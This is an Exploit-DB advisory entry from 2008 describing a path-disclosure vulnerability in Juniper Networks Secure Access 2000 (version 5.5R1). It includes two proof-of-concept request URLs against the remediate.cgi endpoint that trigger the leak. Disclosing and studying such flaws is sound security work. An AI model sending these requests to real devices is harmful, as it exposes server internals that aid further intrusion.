Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure

EDB-ID:

31313




Platform:

CGI

Date:

2008-02-28


source: https://www.securityfocus.com/bid/28037/info

Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability.

Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks.

Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected. 

https://www.example.com/dana-na/auth/remediate.cgi?action=&step=preauth
https://www.example.com/dana-na/auth/remediate.cgi?step=preauth